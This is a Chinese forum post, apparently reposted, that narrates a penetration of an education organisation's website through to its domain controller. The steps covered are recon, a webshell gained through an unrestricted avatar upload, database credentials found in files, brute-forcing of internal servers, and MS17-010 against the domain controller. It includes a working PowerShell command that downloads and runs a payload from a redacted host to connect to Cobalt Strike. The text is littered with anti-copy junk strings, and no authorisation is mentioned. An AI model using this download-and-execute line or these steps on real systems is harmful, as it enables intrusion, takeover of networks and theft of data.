|
# ?% B& K# ]6 k1 r" R
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
+ `4 t, ~3 L- C( O1 Z7 j1 ` - W# O% i2 U4 C( c {! q
( C/ S+ m9 Y6 C' \ e
8 y/ c. F' F6 h
2 b4 u' S" Q) B/ a6 y! _' C+ V3 }" p& r& j6 b# W" d* O4 i2 D
正文* G3 i8 Y6 M( v$ C0 I* c) N
1 L x5 h3 }) t* v
' T; M0 X l0 C3 z, C" @3 M1 E ( S% r2 H. j: R( x+ n7 T
, z W2 o: b! V& N% {
9 S# `7 X4 x8 Y3 N 目标:www.xxxx.com(一家教育机构)
: h2 J, i5 u- U; _0 H+ s+ u+ E
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能" N" h$ y! ~- K1 l& `, G
$ J) H" O3 w1 `4 z- T3 c- `9 }" O* v6 Y$ v
 " n- V, L( [1 |/ N: ^ ]
7 E. w, m5 X. @) O' a; x9 C
7 a8 q+ Q8 t7 i+ v 进行了简单的信息搜集
0 T) Q* d% g8 g8 Q9 f% M8 g2 d
4 p+ M( i1 A' v4 q. c; o- o' K
) g- \. ?$ l3 Y) }
: @& V$ c T4 V/ ^5 Y5 T1 G! F% e4 m1 a) [% p
子域名搜集2 }5 W3 M% P- s t3 R J- u0 K; C
: ?0 M& z4 u0 H
9 A% q1 g9 ]8 U" L3 n. ~ 
# p6 H* z8 } d. U( ~9 U" M
& K' n2 q5 ?; @2 F1 X$ C8 v0 R6 B/ S5 n K
fofa找资产
z! f: O6 w* Y9 r- _
7 v: \+ U; j; B+ M) H
6 ?" x& _" o% i" G: A+ l* S3 Q& e* W9 V4 b
! X; b/ k, g' N% O' p
; |4 V0 e4 D7 |$ t2 v" C1 X: c& e2 ^ 
8 S; z% x; r( P) D8 n . P5 p: K+ G: U. _* k. \& p; C
( @) d5 k( G% D5 {" b
一共七个资产。去重之后只有两个。
) ?) j# b6 Y1 a! ], L
1 v; D9 x2 v0 w1 n: K. `& ?( y9 N9 K+ m/ b4 m, R" L* u# ~
) T& s, m1 f& G" @& n1 i# V
8 ^/ z' \8 t$ ~ y9 h 目录探测* m" g- T# \% p- {
/ j' g! x# s( j# u% g' D( C, c
/ t+ { o; F) b5 a* e. {, W 
/ [6 n* x1 v4 j- a# [) w) v
/ w+ ~! s4 E" X( P1 Z
3 Z1 k5 {) P- X; L& l; u 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& }: M$ X* z' k8 a k
, J5 @- U- i4 \( v# k$ T0 d7 S B* [2 ~/ J; ^
: j9 a% U, D3 E6 |! p
1 h* `$ j/ b9 V+ v: @& x) z 我又尝试了通过修改返回包来绕过登录界面
: c' C& r5 L1 p! `4 \$ Y & K: @% J% s- P, Y
+ {. G0 N4 n" N) l e9 n: V6 g  ! I" Z/ j V+ ^- t4 \9 \' {
* i# P3 X9 s0 x
6 E' T& a& r1 D( C. g* K 还是不行,尝试注入无果
8 M1 p) q! I7 \( x b J
5 v. N% J% A+ |$ D# d. g ]- b4 c7 h; z# [9 T
7 Y' P3 R# h# m 7 _( h8 a* o1 M4 H( \- n, o9 T
2 X. |! m# @: u8 h" d. { 不过我目录探测出了一处Spring信息泄露
' j! d- `4 n$ {. z$ X$ d" x
6 \) A7 W7 ^' o4 @8 e' g# J% ~. y
5 f8 Z8 n) B$ C- w * B8 ]' }- p3 l$ W8 }6 O: r8 }; b# J
& g: J! E$ R: q2 v
 3 |6 `1 a* e2 p3 q1 V! C; \ R' z
1 K. u9 `/ d0 `7 v/ t0 D7 ~. v! c1 S4 x& S$ R* P& H6 P
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录% A# Z7 N: ?' `$ f
3 s. ?8 I4 M% b$ O0 R' Y% p# P4 o
I. Z$ S1 p9 B. ?4 g 
$ ^) a/ n& h, }) u
( U: K) n3 r/ B8 K8 ?( r9 J/ i; D
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。" Q6 ^, g9 h3 p4 a/ T
$ I$ @7 f; p8 Q; u ~8 F6 D
/ t& k" d/ @" x7 y4 ?  4 X- t% M7 U5 D2 R# x
/ I7 e- I5 _7 i4 F* ^% o0 ?+ g* h Q9 E% b. h4 G. ~6 ]7 M; B
获取有些师傅到这一步就手机抓包电脑测了。
4 H7 h2 s! u2 |4 s
/ Q) n; r: r2 N
; G5 K6 n; R1 h# o- V: W7 J Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
" w3 F: C- i: @* P8 [$ \$ D9 q/ y- o9 I. y
/ }) x$ a N- R
: [; [' g9 P( y. d; I' a0 s 其中在一个公众号发现了小程序,可以进行注册。) m% f+ P" {4 V5 A7 t6 c4 r C
- o& P8 m# C! ?2 a5 N: [. ~* S: k+ d% A% H- ]& n( i
看到了头像上传,尝试上传获取WebShell
$ V+ M& \# i7 n( U1 r& I& @3 W
* Y' e( e A+ V, R" n1 ?( o
- Q" g7 b% }. W: o: w 
1 }' E# {, r. o
4 a, Z8 z, ^5 }3 `
4 ^& W- G2 Y, J6 A& V 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问6 {0 S) S% q7 w5 A6 L+ f; P
' s; g8 o' e; R/ o/ d/ H5 h g% G0 D, {, O3 |" u
' ?% W3 G. C5 h- ^- L0 D6 M 5 h( J4 h7 k1 u- x
# K( p+ N- E b% t* [6 k 然后上了大马
- H/ V* w$ b {, _! t / N& m$ n3 |8 r" C2 p; n" \& U3 q
7 C' u3 H7 F+ Q( @) {5 V% i, p0 X
! b3 V6 p) Y) a8 O% q n * k7 Y" s. c& I1 f: v3 l# c1 N
5 }. m$ ^! k$ l' U 
: e2 V1 @( T8 V% @( } 7 {" f7 z9 i5 @9 T( F
2 [3 R" e7 c5 R) E- q! ?6 f) h 通过翻找文件发现数据库账号密码8 d/ A J: c+ j
4 |7 O( r" K* H6 Z
4 v7 w& F( V9 n' O# ^  # N n" E7 v" X% }: f/ Q. W
( Q& b B9 t6 O2 v6 E; K9 i$ M1 r. ^9 V1 x4 U. d
--内网渗透
" a4 h6 Y1 b4 _- h( B3 z& z" z
/ b' s, k0 [+ {
& d3 n5 w' ^$ V M 直接通过powershell执行 cs上线
& q7 u( S/ x/ Y) [ 4 P- A' P1 ^8 r
. w% e/ y% {9 i0 c3 u" i powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
3 T/ Y. `0 N2 x
' M( Z( W1 z/ M8 [( m: K5 l% N; ?* ~
 ' a5 h9 C+ @ J, Z. s& J% i
9 N) u6 o$ q+ e7 B. ^- g
! q$ z) b+ H$ C- }' u
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, s1 N+ K" f8 n$ e* a/ J( w3 [5 ^
0 t+ p5 |3 E& ]8 ^+ J% S- H; }
3 {: y1 ~+ k/ m' a- m
3 i0 \' k% l7 F: x" f
" x. a$ y8 \ L k
8 t# K$ L I$ |' x 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 {, G* x0 B2 N9 w/ ?0 b2 {
, h# l# W+ _4 O5 [# U
, v2 L+ E$ g2 V* W. t" V7 E6 t, p4 X& p2 y+ y
1 h% H0 U# l$ x# W+ f) h9 C
4 i! k6 C) G/ k- x  6 Z4 H4 ]7 ^' Q4 c0 P( y; _, ]' X
, y2 a0 r4 Q9 b" r; _* t
; w$ f" b" p3 i) Q* G 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
( O3 Y& G+ {" g& J# _
+ r* a% A5 h! O" C& d9 U, ~% q- _2 c% J$ A% T
* x4 Y- g6 |' C! ^$ g7 {
+ P* E! U$ ]) y" |0 @ P  , q! v. m% H1 e b5 f- G
) d3 K. B2 v8 z) @+ z8 e
' g" y; O- n% z$ m5 E9 F, v
" M, g# w) i6 }5 k5 q
$ ~6 J, k- a( |
; x* ^0 U% g- L+ F2 R- w " u% E8 Y7 T5 E+ q
0 O7 e$ z+ w3 n$ J0 P$ V3 F2 d
% J/ S4 Z- T" k* P
/ P, ^( q8 e" C1 H& e( R. C I$ Z b/ `
* K% S8 e0 m# f. c2 q 小结8 T3 v9 J* P" `% e6 N$ @
: ?# g' F, ?. }. P" e; O9 d$ J/ E9 C/ F' u, W0 H8 @7 [
- L1 L* e3 U2 h1 ?2 M 0 J2 i. Z5 H$ v/ W5 W0 f
% ~$ |( z' M" m6 v/ n& f
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
! Z/ n8 F. a8 u q- } Y& H0 e8 j
" Q( N0 c! x+ J% Z1 M
/ w( x3 C+ ?5 E# B0 h( `
3 L; I g* S! @7 ~, s. M7 E& F+ O% ?. f0 K% R+ k, H: I. y7 O
- ! h5 w* x, l$ N
( I6 D; U+ L! B0 k+ Q/ f
1 W d |; D. Z# V6 G8 {
-
/ h6 a* Q: l1 T: i! D4 |+ L 9 r7 C, f* E# L Y' r
% O; J' I( Y# P; \7 W0 ?1 s m. A ( k( |% v' N* F' ?2 q
' [2 {1 T' v' n 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
" Y2 V9 o0 E1 G% ` 8 M4 b: ^* a' o. ]6 A. H
$ f( p- N7 W6 D/ o$ T
4 P( f6 i, [$ {: P3 e8 h _) E9 T | 
发表于 2024-3-1 19:41:32
收藏
支持
反对